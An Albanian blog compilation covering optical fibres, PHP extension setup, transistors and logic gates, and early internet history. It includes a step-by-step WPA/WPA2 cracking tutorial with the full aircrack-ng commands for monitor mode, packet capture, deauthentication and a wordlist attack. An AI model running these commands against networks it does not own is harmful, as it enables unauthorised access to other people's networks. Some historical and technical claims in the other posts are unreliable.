Fibrat optike.

Ne kete teme dua te pershkruaj pak se si funksionojne fibrat optike qe bejne pjese ne teknologjine me te re per trasmetimin e informacionit.
Kjo teknologji ka zevendesuar kabllot e ndryshem prej bakri duke pasur shum avantazhe.
Fibrat u futen ne tregun e sotem si pasoje e nevojes per te transmetuar informacionin me shpejtesi me te larte per te transmetuar me nje debit te larte (bit/rate) dhe me nje gjeresi brezi frekuencash shum me te madhe.

Keto te fundit mund te prodhohen lehtesisht dhe kane nje kosto shum me te lire.
Si peparsi e tyre eshte dhe fleksibiliteti dhe aftesia e madhe per te punuar edhe ne abjente ekstreme temperatura te larta dhe shum te ulta. Ndertimi i nje fibre eshte shume me i lehte nga ajo cmendojne njerezit ja nje fig ilustruese:

Fiber optike

Fiber optike

Kjo qe shihni eshte nje fiber ku ne qender kemi nje cilinder xhami ne te cilin behet dhe transmetimi i drites. Ne pjesen e jashtme ka perseri nje mbulim prap xhami por me nje koeficet perthyerje 1% me te madh se ai i cilindrit qendror.

Funksionimi i nje fibre.

Nje fiber optike transmeton me nje burim drite i cili mbart nje informacion. Parimi kryesor i punes se nje fibre optike eshte ligji i Snellit. Gjithashtu burimi duhet qe te krijoj ne fiber nje pasqyrim te plote te mbrendshem dhe kjo qe ndodh kur koeficenti i thyerjes se mjedisit te pare eshte me i vogel se ai i mjedisit te dyte qe eshte xhami, pra n1<n2 kur ky kusht plotesohet drita qe futet ne fiber fillon te pasqyrohet ne mynyre zigzage deri ne dalje te fibres. Ja nje fig qe e ilustron:

Nje faktor i rendesishem eshte dhe hapja numerike e fibres qe ka te bej me kendin me te vogel te mundshem qe lejon futjen e drites NA sa me e madhe te jete NA aq me shume e holle mund te projektohet nje fiber.

Burimi i drites.

Burimi i drites apo dhe mesazheri i informacionit te fibres mund te jete nje laser me nje gjatesi vale te caktuar dhe me nje frekuence te caktuar gjithashtu mund te perdoren edhe dioda led te cilat bejne te njejten gje por laserat jane me te mire ne fakt per te bere kete gje.

Llojet e fibrave optike:

Llojet e fibrave optike jane dy llojesh nga menyra e transmetimit te drites ne mbrendesi te tyre. Ato jane SIF (step-index fiber) dhe GIF (graduate index fiber). Ndryshimi midis tyre qendron pasi ne keto te parat e bejne transmetimin e drites ne menyre zigzage ndersa fibrat Gif e bejne kete gje ne menyre te lakuar . Fibrat Gif kane peparsi pasi sinjali i drites ne to ka nje gjeresi brezi frekuencash me te madhe dhe por dhe nje si pasoje nje gjatesi vale me te vogel dhe nuk rekomandohen ne largesi te medha pasi do ti duheshin shume perserites.

Fibrat Single Mode

Keto jane fibrat qe perdoren gjeresisht per largesi te medha dhe kane nje veti qe mund te transmetojne ne largesi te medha pa pasur nevoje per amplifikatore perserites

Fibrat Multi Mode

Perdoren ne raste te vecanta kur kemi largesi te vogla duam shpejtesi te medha dhe gjeresi brezi te madhe me debit te larte.

Fibrat ne pergjithesi mund te perdoren kudo ne telefoni ne transmetime video, audio dhe te dhena ne rastin e internetit etj.

Shum shpejt do te pergatis nje teme mbi burimet e sinjaleve te fibrave sic jane laserat.

Hacking (jo cracking) WPA\WPA2

Meqe pushimet nuk me kane filluar akoma thashe te shkruaja dhe nje  guid te vogel ne sigurine e wpa\wpa2 te cilet siç e njohim jane me te sigurt se sa WEP dhe kjo eshte e vertet.
E quajta HACKING pasi kjo thyerje sigurie ne kete rast eshte vetem per qellime informative dhe ketu eshte per qellim vetem nje ilustrim i menyres se thjesht se si mund te thyhet nje algoritem i tille.
Per ata  ( si tbc-crew pershembull ) qe nuk bejn dot dallimi midis cracker, hacker, script-kiddie keshillohet te lexohet tema:
http://albanianwizard.org/2009/01/hackers-ky-keqkuptim-i-madh/
Kete teme do e trajtojm pak me kujdes ne menyre qe te sqarojm disa gjera qe zakonisht shumica prej nesh i shohin dhe nuk ndalojn te mendojn tek ato, por thjesht shohin “qellimin” e te gjith kesaj.
WPA (Wi-FI Protected access) qe do te thote se kemi te bejm me nje program autentifikimi ose me sakt certifikimi kur lidhemi me routerat e ndryshem.
Pra eshte dritarja qe te kerkon passwordin :)
Kujdes nuk po flasim per WEP pasi i mbetes se kaluares dhe depertimi eshte shume me i thjesht ne rastet kur kemi te bejm me WEP.

Mire, per te bere te gjitha keto do perdorim nje program shume te njohur te cilin mund ta shkarkojm nga webi zyrtar:
http://www.aircrack-ng.org/doku.php
Egziston si versioni per windows ashtu dhe ai per linux.
SITUATA
Kemi nje router i cili perdor WPA dhe nje client (kompiuter) i cili eshte i lidhur me te, ne jemi afer access point (mbajeni mend me access point do te quajm routerin pra pika e aksesit) dhe kerkojm qe te hackojm kete rrjet wireless.
Ç’fare duhet te bejm?
Ne rradhe te pare duhet te kuptojm qe WPA, nuk eshte si WEP keshtu qe kerkon disa kushte qe ne te hakojm neper te.

E para eshte qe medoemos duhet te jete nje kompiuter i lidhur me rrjetin e tij, pra normalisht dikush qe e ka passwordin dhe eshte i lidhur me routerin e tij duke pare ndeshjen e futbollit online pershembull…

Fillojm punen.

1). Pergatisim skeden wireless
2). Perdorim airodump-ng per analizimin e paketave gjithashtu per kapjen e tyre
3). Perdorim aireplay-ng per te bere nje sulm MIM (Man in the middle)
4). Perdorim aircrack-ng per te gjetur passwordin e rezultuar nga handsharke (do e shpjegojm me vone)..

1). Pergatisim skeden wireless
Normalisht paisja qe do perdorim per kete pune, do te jete skeda wireless dhe duhet qe ate ta kthejm ne nje monitor ne menyre qe te jete e afte per analizimin e paketave dhe per dergimin e tyre ne nje menyre te personalizuar 😉
Gjeja e pare qe bejm eshte çaktivizojm wireless, pra nese kemi kerkimin e wireless te aktivizuar e çaktivizojm dhe tani hyjm nga terminali.
Ka 2 menyra per ta bere kete, me e mira eshte duke perdorum airmon-ng dhe tjetra, ajo tradicionale me komandat e linux.
Me airmon japim komanden

#airmon-ng stop wlan0 ose ath0 (varet nga skeda qe kemi) pastaj japim #airmon-ng start wlan0

Dhe duhet te kemi kete output:

Interface      Chipset            Driver
wlan0          iwl12345           madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Nese kemi output tjeter, ç’faredolloj gabimi dhe diçka tjeter nga pamja e mesiperme do te thote se nuk kemi ne rregull driverin ose kemi probleme me modulet e kernelit dhe ne keto raste duhet te shkojm te shkarkojm dhe te instalojm patch per skeden tone wireless.
http://patches.aircrack-ng.org/
Per instalimin e tyre duhet te shikoni http://www.aircrack-ng.org/doku.php?id=install_drivers
Menyre tjeter per ta kthyer skeden ne monitor eshte kjo: (japim nga terminali)

ifconfig wlan0 down
iwconfig wlan0 mode monitor

Mbas kesaj skeda jone eshte ne monitorim dhe mund te kalojm tek etapa e dyte.
Japim komanden airodump-ng wlan0 nga terminali si root (ose si administrator tek windows) dhe shohim se ç’fare kemi verdall..
Ja nje output i mire..

Fillojm ilustrimin e asaj qe kemi perpara..
Siç e shohim fotoja ndahet ne dy seksione, i pari lart qe tregon per routerat dhe i dyti qe tregon per klientet e lidhur apo jo te lidhur me to.
Fillojm shpjegimine disa gjerave kryesore qe duhet ti dime..
BSSID dhe shohim adresa qe si kuptojm, po ç’fare jane ato?
Ato jane adresat MAC te routerave pra kemi te bejm me access point.
Beacon eshte transmetimi i sinjalit (lidhet me lokacionin) nga routeri dhe sa me shpejt te rritet numri i “Beacon” aq me afer routerit jemi (ose aq me i fuqishem eshte sinjali i routerit) dhe sa me i vogel te jete atehere aq me larg tij jemi ose aq me pak i fuqishem eshte routeri.
Data, jane paketat qe lexohen nga skeda jone wireless (pra ato qe kapen)
CH, eshte Channel pra stacioni, ose frekuenca ne te cilen po egzektuohet sinjali
ENC (encryption) do te thote se ç’fare lloj encryption po perdor routeri pra WPA\WPA2\WEP nese keni OPN ateher do te thote open dhe kemi 2 raste, ose i zoti i routerit eshte aq i mire sa ti le edhe te tjeret te kene internet falas (gje qe nuk ndodh sot ne kete bot me njerez qe mendojn vetem per vete), ose pronari eshte aq budalla ose aq injorant saqe nuk ka ditur te vendosi nje password.
Mendoj rasti i dyte eshte me i mundshem..
Vazhdojm..
Cipher dhe Auth ka te beje me autentifikimi dhe metoden e autentifikimit, nese shikoni Enterprise 😀 harrojeni se do e gjeni passwordin, TKIP eshte me e zakonshmja..
ESSID eshte emri i routerit qe kemi, ne rastin me siper nuk gjendet imi :) keshtu qe mos shiko kot asd.
Kalojm tek pjesa e dyte e fotos ku shohim STATION?
ç’fare jane ato?
Asgje tjeter vetem se kompiuterat e lidhur me routerat.
Pra shohim BSSID dhe STATION, poshte BSSID esthe mac adresa e routerit, kurse STATION eshte adresa MAC e skedes wireless te komshiut 😛 .
kemi Station te tjere ku shkruhet (not associated) qe do te thote se ata thjesht kane kompiuterin ndezur dhe nuk kane asnjelloj lidhje me internetin, pra nuk jane te lidhur me router.
Probes,  nenkupton tentativat qe kane pasur per tu lidhur me ndonje access point kompiuterat.
Raste:
Kur ne pjesen e pare te fotos nuk kemi asgje, dhe ne pjesen e dyte shohim STATION me mac adresen e skedes wireless dhe (not associated) ç’fare do te thote, do te thote qe skemi router ne afersi por ka kompiutera qe kane lene ndezur skeden wireless.
Po kur tek pjesa e pare e fotos shoh BSSID, (acces point) dhe marr data nga ata, por ne pjesen e dyte te fotos nuk shoh asnje STATION (client) atehere do te thote qe askush nuk eshte i lidhur dhe ne rastin e WPA duhet te presim medoemos qe dikush te lidhet me routerin pra te krijohet nje komunikim dhe transfert datash midis routerit dhe kompiuterit ne fjale te tjera midis BSSID dhe STATION.

Kur shohim qe dikush eshte lidhur me nje nga routerat qe kemi ne monitorim atehere japim nga terminali:

airodump-ng -c 11 --bssid <adresa mac e routerit> -w ketushpetojmpaketat.cap wlan0

Shpjegojm komanden qe dhame, -c do te thote kanali pra eshte ekuivalent me CH (channel) frekuenzen ne te cilen routeri po perhap te dhena, –bssid eshte adresa mac e routerit tek i cili pam qe u lidh dikush..
-w (write) ketushpetojmpaketat.cap ne fjale te tjera i themi programit qe te gjitha paketat qe do kapesh nga ky router do i shkruash ne nje file .cap dhe do e gjejm ne te njejtin vend qe jemi ne terminal.
wlan0 eshte interface i skedes tone wireless.
Tani erdhi koha qe te shpjegojm pak se si funksionon dhe hacking dhe kjo lloj metodologjie..
Dihet qe kur kompiuteri lidhet me routerin, ata shkembejn informacion me njeri-tjetrin dhe ndodh handshake.
kompiuteri: ç’kemi router
Routeri: ç’kemi kompiuter
kompiueteri: tani qe me njohe po e bej nje xhiro andej nga interneti 😀
Keshtu qe ne kerkojm te kapim pikerisht kete paket tek e cila ndodhet edhe passwordi i cili e beri routerin qe te njihte kompiuterin, prandaj i tha ç’kemi kompiuter dhe si tha psh, ç’kemi ruzhdi xD.
Keshtu qe ne na duhet pikerisht ajo paket, dhe qe ta bejm kete duhet qe te jemi me snifer ne ajer pikerisht kur client lidhet me routerin por ne nuk do rrim gjith diten duke monitoruar keshtu qe na duhet nje sulm MIM (Man in the middle) dhe ketu kaloj tek:
Faza 3
Qe te kemi paketen e autentifikimit per te cilen folem me siper duhet qe ti çojm te dy komponenteve, si routerit ashtu dhe kompiuterit nje paket e cila do i thote kompiuterit : “UPS, routeri u shkeput, lidhu prap me te”, dhe do i thote routerit “UPS, kompiuteri u shkeput, lidhu prap me te”…
Normalisht mund te pyesni, po si shpjegohet qe routeri kujton se po i flet kompiuteri dhe kompiuteri kujton se po i flet routeri?
Pikerisht kjo eshte baza e nje sulmi MIM pasi sulmuesi u flet viktimave me mac adresat e njeri-tjetrit, dhe ata kujtojn se jane duke folur me njeri-tjetrin..

Nuk gjeta foto tjeter, keshtu qe SERVICE AGENCY konsiderojeni si router ose si BSSID.
Bukur tani i bejm keto te dy pra STAION DHE BSSID qe te kujtojn se jane shkeputur dhe ata do te rilidhen dhe airodump-ng qe eshte ne egzekutim, nese jemi afer saç duhet dhe nuk humbin paketat do te kapi dhe paketen “handshake” e cila na duhet per decryptimin e passwordit.
Per ti bere te kujtojn qe jane shkeputur me njeri-tjetri japim:

 aireplay-ng -0 5 -a <mac adresa e routerit (bssid)> -c <mac adresa e skedes wireless te kompiuterit (STATION)> wlan0

Bukur, ne kete moment ne po dergojm nje sulm –deauth (Deauthentication) dhe ne momentin qe ata rildhen do te kemi paketen e deshiruar.
Pa kuptuar arritem tek…
FAZA FINALE
Tani kemi te bejm ne realitet me decryptimin e paketave duke perdorur nje sulm brutus-force.
Nese nuk e keni idene atehere konsiston ne provimin e passwordeve njeri pas tjetrit deri sa ne ate list te gjere duke konfrontuar passworde me njeri-tjetrin te gjendet ai reali (prandaj duhet te perdorim gjithmon passworde te fort) psh nje
password i fort routeri do te ishte:
9/&@sJD76)jssd?ì]*§sd/d6%tG
Bukur keshtu qe na duhet nje wordlist te cilat mund ti gjejm pa problem me internet dhe i shkarkojm.
Nese gjejm nje tekst file atehere e mira eshte ta riemerojm me ekstension .lst
Dhe kur i kemi te gjitha keto eshte koha te perdorim failin tone .cap ne te cilin gjendet paketa e autentifikimit me passwordin..
JAPIM:

aircrack-ng -w wordlista.lst -b <macadresarouterit> ketushpetojmpaketat.cap

Dhe nese jemi me fat, aircrack do te bej decryptimin dhe nje krahasim algoritmash duke gjetur passwordin.

5. Demo ne video:
Kliko per te shkarkuar
Perfundim.
Gjithsecili ka paguar leke per internetin dhe marrja e tij eshte vjedhje, mosrespektim i vetes gjithashtu dhe i atij tek i cili po drejtohet ky sulm.
Nuk lejohet dhe eshte veprim shume i ulet perdorimi i internetit tek personi tjeter, eshte njelloj sikur ti hysh ne shtepi e ti vjedhesh buken nga dollapi!!
Mos u beni hajdut pasi kjo do ndikoj keq ne shoqeri dhe me se shumti ne vetveten tuaj duke u kthyer ne kafsh dhe jo njerez.

Te karikojm ekstensionet php ne servera linux dhe windows.

Kur instalojm ndonje platform normalisht na ndodh qe te kerkoj nje ekstension (librari) te php-s si suport per platformen.
Ne fjale te tjera nuk jane gje tjeter perveç se librari qe i duhen gjuhes per te interpretuar “query” te ndryshme..
Po permend disa te njohura psh curl ose mcrypt, gd etj etj..
Pra nevoiten dhe duhet qe ti instalojm.
Atehere, i instalojm ne makinen tone, dhe per ti karikuar normalisht duhet te shkojm tek /etc/php.ini ose /etc/php5/php.ini
Varet nga sistemi operativ qe kemi, psh  tek fedora nuk kemi nevoj qe te editojm failin php.ini pasi ato ekstensione.ini qe gjenden tek /etc/php.d/ jane te karikuara automatikisht, gjithsesi ne sisteme te tjera, menyra per te karikuar keto module eshte e meposhtmja:
Linux
Hapim failin php.ini (nese nuk e gjeni ne direktorit e mesiperme atehere jepni whereis php.ini) dhe shkojm tek seksioni:
Dynamic Extensions
Ne kete moment shkruajm

extension=mhash.so
extension=soap.so
extesion=gd.so

Pra me te gjitha ato qe duam te karikojm..

Windows
E njejta gje, shkojm dhe gjejm php.ini dhe tek i njejti seksion shtojm kesaj rradhe librarit qe siç e dim ne windows jane me ekstension .dll
Perkatesisht:

extension=mhash.dll
extension=soap.dll
extesion=gd.dll

Normalisht nuk ka nevoje per restart, por per siguri restartoni #service httpd restart #service mysqld restart
Persa i perket instalimit eshte dhe nje menyre tjeter e cila nuk me ka punuar ndonjehere ne fedora xD dhe as kam pasur kohe te merrem me problemet e saj..
pear install <emri-ekstensionit>
Psh,

pear install dom dhe duhet te lidhet me php.net.. te shkarkoj dhe te instaloj automatikisht..
Normalisht instalimi behet si me ç’do program tjeter linux ose duke instaluar nga source kodi..
.configure  make   make install
Ose me paketa rpm \ deb \ tgz (slackware) qe jane te gatshme dhe instalimi behet me package menaxheret…

Tranzistori, sqarimi per shume dogma keqkuptuese, dhe portat qe krijohen ne cirkuitet e kompiuterit.

————————_______________———————-____________________————————–
Kompiuteri eshte nje mashtrues i madh !! 😀
———————-__________________————————–____________________——————–

Me kete shprehje dua te them se ai kryen vertet shume pune, dhe zgjidh shume probleme te komplikuara duke na kursyer kohen dhe duke bere veprime qe ne nuk do te arrinim kurre ti benim ne nje hark kohor te perbashket.
Por ne realitet llogjika mbi te cilen eshte ndertuar kompiuteri eshte shume e thjesht, gje qe me ben te them shprehjen e mesiperme qe normalisht eshte pakuptim ne aspektin nese nuk kuptojm (me falni per lojen e fjaleve) nentekstin qe  bart.
Pra ne shikojm se sa LLOGJIK eshte nje kompiuter, dhe se sa te komplikuara jane ndonjehere veprimet e jashtme qe ne kerkojm te bejm duke shkruajtur nje algoritem ..
Por ne realitet a eshte kaq i komplikuar ne brendesi te tij?
Normalisht po ta shohim nga jashte (brendesine e tij, cirkuitet motherboardin etj) eshte vertet nje kaos per nje sy pa eksperienc.
Dhe perveç te tjerash ne tek ai shohim dhe cirkuitet e ndryshme, ne te cilat rrjedhin fuqite e impulset elektrike [eshte gabim te thuhet se ne cirkuite rrjedh rryma elektrike pasi tek njeriu psh rrjedh gjaku dhe jo rryma e gjakut] te quajtura bit tamam siç rrjedh gjaku ne venat e njeriut.
Ne kete rast, ne do te studjojm “nyjet e venave” te kompiuterit.
Pra ato pjese te tij qe alternojn fuqine e impulsit elektrik qe mund ta bejn te jete 0, dhe mund ta bejn te jete 1 ose me sakt mund te bejn qe te jete  3-5v ose me i vogel se 0-3v (volt).
Per me shume info rreth bit, sistemit binar dhe informacioneve se si perkthehet kodi yne ne impulse elektrike drejtojuni kesaj teme:
http://albanianwizard.org/2008/12/binary-bit-te-verteta-dhe-sekrete/

Siç e dime, kompiuteri perbehet nga shume chip-e, ose silicon chip, ose me Cirkuitet e integruara (versionet e evoluara) qe perbehen nga shume shume shume tranzistore te cilet nuk jane asgje tjeter vetem se nje diode e evoluar.[biploare + nje terminal kontrolli (gjithsej 3)]
Llogjika ne te cilen “mendon” nje kompiuter eshte llogjika boleane (do trajtohet here tjeter) e ideuar ne 1800 (George Boole) dhe nese ajo kombinohet mund te arrij vertet nje fuqi, fuqi te cilen e njohim sot me ane te kompiuterit.
Le te shohim se si rrodhen ngjarjet ne kete zhvillim dhe ku gjendemi sot.
Nje veshtrim historik.
Ne fillim erdhen diodat (1874 nga shkencetaret gjerman)
Pastaj erdhen tranzistoret. (1947, Walter Brattain [ne realitet me heret, 1925 kanada]
Pastaj erdhen cirkuitet (chip-e) e integruara  (i pari qe punoi ne rregull 1958) te cilat permbajn ne vetvete shume dioda dhe tranzistor.
Me vone erdhen dhe mikroproçesoret qe qe ne brendesi te tyre permbajn shume cirkuite te integruara A,A ,A ,A ,A!!!

GABIM!
Ky eshte nje gabim shume i zakonshem, pasi ata qe e bejn kete gabim nuk kane studiuar mire se si jane perbere keta komponent per te cilet thjesht po i permendim per temen tone.
Pjesa me e rendesishme e cirkuitit te integruara eshte  mikroproçesori i cili  i jep memorje cirkuitit te integruar per te  kryer veprime llogjike te drejtuara nga njesia e kontrollit qe gjendet ne proçesor (kujdes thashe proçesor jo mikroproçesor).
Per te mos u shperndare shume, cirkuitet e integruara jane njesi llogjike dhe sot ç’do paisje elektronike ka nje te tille ne brendesi te tij, por keto cirkuite erdhen gjithmon e duke u permirsuar dhe sillnin gjenerata te reja duke perfshire keshtu me ç’do gjenerate te re nga nje veçori te re dhe me shume tranzistor te perfshire brenda saj.
Gjenerata e pare ishin (SSI) ose SSIC (Small Scale Integrated Circuits) me me pak se 100 tranzistor, MSIc me 100-1000 tranzistor,
Gjerata e dyte erdhi me (LSI): 1000 deri 10000 tranzistore dhe VLSI 10000 – 1.000.000 tranzistore ULSI me mbi 1 milion permend ketu INTEL.
Nese mund te themi gjenerata e trete atehere mund te permendim WSI 3D-IC ..Te gjitha keto paisje elektronike nuk bejn asgje tjeter perveç se, menaxhojn (drejtojn, kontrollojn, alternojn) kete fluks elektrik , pjesezat e te cilit per nje perceptim me te mire ne u kemi vene emrin BIT ne baze te nje LLOGJIKE te cilen do e shohim ne vazhdim.Ne pamje te pare, kemi disa tranzistore:



Bukur, ç’fare eshte dhe ç’fare ben nje tranzistor?
Nuk dua te bej gabimet trashanike qe behen kur shpjegohen keto komponent hardware keshtu qe po jap perkufizimin e te dy grupeve, atyre klasik dhe atyre modern.
Normalisht ndahen ne shume lloje, po po perpiqemi ti permbledhim.
Tradicionalisht e njohim si “paisje elektronike baze” e cila eshte e afte te ndryshoje rrymen elektrike (per ta rritur ose per ta ulur) dhe perbehet nga 3 terminale ku njeri perçon apo dergon, tjetri merr dhe njeri eshte baze.
Tani le te “pastrojm” indoktrinimet tona me terminologjine qe na jepet dhe shpjegimet cinike do i quaja.
Siç e dime tranzistori eshte nje gjysemperçues dhe ne dhe ne na eshte thene “e perçon rrymen” dhe “nuk e perçon rrymen”, e “perçon rrymen mire”, dhe “nuk e perçon rrymen mire”..
A nuk na eshte thene keshtu?
A nuk na kane mesuar keshtu?
Pra tamam si keqkuptimi i “kalojn impulset elektrike”.
Kur themi “perçojn rrymen mire” rryma trajtohet ketu si diçka qe kalon tek ky perçues por sikur kalon treni tallashit tek stacioni i tij.
Por a eshte realiteti se kjo rryme eshte nje mase qe kalon nga nje perçues tek tjetri?
Normalisht qe nuk eshte ashtu !!
Fizikantet perdorin termin “oqeani i metaleve me elektrone”.
Kete fuqi rryme nuk e perbejn asgje tjeter perveç se elektronet te cilat nuk vijn nga perçuesi ne perçues, ose nga gjysmeperçuesi ne gjysemperçues pasi ne kete rast nese ne nje metal do te kalonte rryma atehere metali do te boshatisej nga elektronet dhe ne te nuk do te kishte mundesi te kalohej me rryme.
Po ne kete rast ç’fare termi do te na thoni apo “ngeli bosh”?
Pra elektronet gjenden tek metali pasi metali eshte i perber nga atomet, molekulat, ka numer atomik etj.
Tjeter, tranzistori pra eshte bere pikerisht per te pasur aftesine e kontrollimit te kesaj fuqie te cilen e kalon (nuk po me vjen ne mendje nje folje e pershtatshme pasi e shtyn do ishte gabim) ne nje drejtim te caktuar me ane te fushave te tensionit.
Bukur, deri ketu e sqaruam.
Te shohim pak se si punon nje tranzistor.
Thame se eshte nje postobllok, i cili ne saje te fushave te tensionit lejon qe “elektronet te ngacmohen” dhe te behen perçues te fuqise se rrymes elektrike.
Ja nje pamje banale per kuptimin e kesaj qe thashe:

Shume mire.
Krijohet pyetja se si tranzistori mund te krijoj porta?
Dhe me shume, si mund te permbaj instruksione?
Sipas Intel tranzistori eshte ne gjendje te:

Dhe per te pare nga fillimi deri ne fund nje tranzistor nga i fikur ne i ndezur jeni te lutur te vizitoni linkun e meposhtem:
http://www.intel.com/education/transworks/flat7.htm
Pra ne baze alterimeve qe eshte ne gjendje ti beje fuqise se rrymes elektrike ne saje te fushave te tensionit, eshte ne gjendje te na japi nje 0 apo ne 1, ne fjale te tjera te paraqisi nje shkronje, nje fjale, nje fjali, nje numer, dhe te kryej operacionet baze si ato te mbledhjes , zbritjes , pjestimit, shumezimit etj te cilat kryhen me ane te portave te cilat do i shohim ne vazhdim.
Po rendisim 7 porta te thjeshta me ane te te cilave njesia e kontrollit mund te dalloj nje instruksion AND nga nje instruksion OR e keshtu me rradhe.
1.Ajo qe NUK eshte port, pra NOT port
Kjo port nese merr nje fuqi elektrike nga 3-5 volt e kthen ate ne nje fuqi nga 0-3 pra nese merr “1”-sh e kthen ne “0”..
Po quajm me A ato qe hyjn tek kjo port, dhe po quajm me R rezultatin qe del prej saj dhe ne baze te kesaj kemi:
A R
1  0
0  1
{s’ja them per design :( }

Vazhdojm me
2.Porta AND (DHE)
A     B R
0     0     0
0     1     0

1     0     0    (nese A = 1
DHE B = 0 atehere R = 0)
1     1     13.Porta OR (OSE)  (eshte porta 2 e kthyer permbys)
Me poshte do te shohim kombinimin e Portave OR (OSE) , AND (DHE) me porten NO (jo) port.
A     B R
0     0     0
0     1     1
1     0     1
1     1     1    (nese A = 1
OSE B = 1 atehere R = 1)

[4 dhe 5 ]Porta NAND Dhe NOR, pra ne shqip JODHE | JOOSE
Nje paraqitje grafike do te ishte:

NAND                                             NOR
A     B R A     B R
0     0     1                                    0     0     1
0     1     1                                    0     1     0
1     0     1                                    1     0     0
1     1     0                                    1     1     0

6.Porta XOR [hidhini nje sy kapitullit te logjikes tek matematika, eshte e njejta gje, pra i njejti veprim xor :) ]
A     B R
0     0     0
0     1     1 (nese A ose B eshte 1 por jo te dyja atehere R = 1)
1     0     1 (nese A ose B eshte 1 por jo te dyja atehere R = 1)
1     1     0

7.Porta XNOR  (bashkim midis portave JO dhe OR (NOR) me ose pra X)
A     B R
0     0     1
0     1     0
1     0     0
1     1     1

____________________—————————-_______________________———————————_______________

Shpresoj se ne fund te ketij leksioni, paper, quajeni si te doni te keni mesuar se ç’fare jane tranzistoret, si punojn, Si punon kompiuteri, dhe me e rendesishmja se ç’fare eshte se te gjitha keto aparate qe permendem sherbejn vetem per menxhimin e fuqise se rrymes elektrike , menaxhim te cilin e ben njesia e kontrollit (te cilin imagjinojeni si nje dirigjent) kurse orkestra ne kete rast eshte cirkuiti i integruar, tranzistori, dhe te gjith komponentet e tjere te cilet i kemi lene pa permendur.
——————————__________________________————————————————__________________________

Materiali si te gjith materialet e tjera mund te shperndahet veten duke respektuar Liçencen Creative Commons 3.0

…. dhe lindi interneti ….

Ne realitet per titullin qe sapo lexuat nuk do te shkruhet shume..
Nuk me pelqen te shkruaj per historine ne pergjithesi :)
Ky material eshte sepse shume miq me kane pyetur per “dark internet” apo me sakt per ate pjese te internetit qe eshte e panjohur.
LoL, mos prisni zgjidhjen ne kete teme, gjithsecili ben kerkimet e veta dhe mund te them qe keni kerkuar ne menyren e gabuar :D.
Po hedhim nje veshtrim se si filloi e gjithe kjo, zhvillimet qe ka marre, a e “kontrollon” njeri apo kompani internetin, dhe po hedhim nje veshtrim mbi dark internet term te cilin wikipedia e perkufizon, dhe thote : “It should not be confused with either Deep Web or darknet.”
Ne vazhdim do e shohim ne disa kendveshtrime duke u bazuar ne fakte kete tematike disi misterioze dhe normalisht shume interesante.

Kur u krijua interneti, (viti 1962) nuk ka pasur microsoft (:D) biles ne ate kohe nuk egzistonte as fjala internet.
Ne kete kohe AT&T , vendi ku u fabrikuan sistemet UNIX kishte monopolin e saj ne transferimin e te dhenave (data) nepermjet telefonit.
Advanced Research Projects Agency (ARPA) e U.S Departamenti i mbrojtjes nisi projektin ARPANET i cili perdorte si teknollogji lidhjeje packet switching ne pergjigje te Satelitit Artificial Sputnik te ruseve. (kujtoj ne ate kohe ishte “lufta e ftohte”)
Keshtu qe duhet te kuptojm mire qe qellimi i ketij networku :

nuk ishte per asnje arsye tjeter perveç se asaj ushtarake dhe ne thelb per nje menyre kontrolli mbi rraketat mbas nje sulmi nuklear te pesuar.
Ne fillim ka pasur vetem 4 hoste, dhe nje rrjet me fuqi 50kbps. Nyjet e para qe ju bashkangjiten ARPANET ishin Universitete, (ai i kalifornise ne santa barbara dhe los angeles, SRI (Stanford), ) dhe me vone u hap akoma me shume duke lene normalisht te izoluar. Per ti rene shkurt u krijuan dhe network te tjere, dhe me vone TCP\IP (Bob Kahn i DARPA dhe Vinton Cerf i Stanford) shenoi nje “epoke te re” e cila solli Backbone qe sollen perfundimisht dhe mbylljen e ARPA-NET.
Nje kuriozitet, ai qe dergoi paketen e pare ka qene Charley Kline i cili kerkoi te lidhej me Stanford dhe sistemi pesoi krash 😀 (ketu me duket se se ka fain bill gates xD).
Me vone u shtuan dhe NET-worke te tjera dhe pak a shume kjo ishte pamja ne 1987

Ky eshte momenti ku duken fillimet e atij qe sot me pelqen ta quaj interkaos dhe jo internet.
Mire, pra kuptuam pak a shume se si nisi e gjithe kjo.
Informacione qe thjesht na japin nje tabllo te pergjithshme dhe introduktive te asaj qe eshte sot ne realitet.
Ne ate kohe, thjesht ishte shpikur protokolli TCP\IP, po sa protokolle numurojm sot?
Sa menyra komunikimi midis kompiuterave?
Nje pafundesi te vertet.
Terheq verejtjen ketu, pasi duhet te dime qe nje kompiuter, server apo ç’faredo mund te krijoj nje lidhje ne nje menyre apo ne nje tjeter, normalisht kete e dini dhe dua thjesh te rikujtoj se ne nje hart te madhe me router core, server, hoste etj etj komunikimi midis 2 njesive kerkon lidhjen e njesive te tjera me njera tjetren dhe “ndriçimin” e rrugeve.
Nje shembull banal per kete eshte psh, nese jeni ne linux beni traceroute albanianwizard.org nese jeni ne windows atehere perdorni tracert albanianwizard.org dhe do te shohim se ne sa nyje do te kalojn paketat tona per te arritur tek albanianwizard.org.
Kush eshte pronari i internetit?
Nese lexojm perdit, na mbushin mendjen me “askush” por gjithmon eshte “dikush” i cili ka me shume se “dikush” tjeter, normalisht interneti nuk eshte shnderruar ne monopol por jo ne te gjitha shtetet.
Realiteti eshte faktikisht qe eshte shume e pamundur qe te monitorohet interneti dhe te dhenat qe mund te merren jane ne proporcion shume jo racional, dhe lihet me shume dhe hamendja panvarsisht menyrave te ndryshme se si mund te monitorohet interneti.
Per mendimin tim , me seriozi dhe me i specializuari per kete pune eshte :
http://www.caida.org/
Gjithsesi ti hedhim nje sy shperndarjes se pergjithshme ne baze networkesh ne ameriken veriore.
Shkarkoni kete pdf per me shume info:
http://albanianwizard.org/ngarkime/Internet_map.pdf
Tek mapa ngjyat jane perkatesisht: Blu => AT&T; E kuqe => Verizon; E verdh => Qwest; Jeshile => Major Bacbone; me te zeze eshte industria e marre bashk, gri eshte pjesa tjeter.
Le te shohim pak nje pamje disi me imagjinare te internetit, panvaresisht se tek kjo adrese perdoren traceroute dhe monitorime goxha te mira.
http://idl.net
Klikojm ne nje nga mapat dhe zhvendosemi ne nje pjese te internetit, dhe po te shohim pjesa me e madhe eshte e paeksploruar (kjo edhe per faktin e aplikativeve qe perdorin ne web) por ajo qe dua te them eshte se edhe vet CAIDA ka pranuar egzistencen e atyre qe i quan me “Hidden Metric Spaces” dhe per te vazhduar lexoni ketu dhe kthehemi perseri me temen.
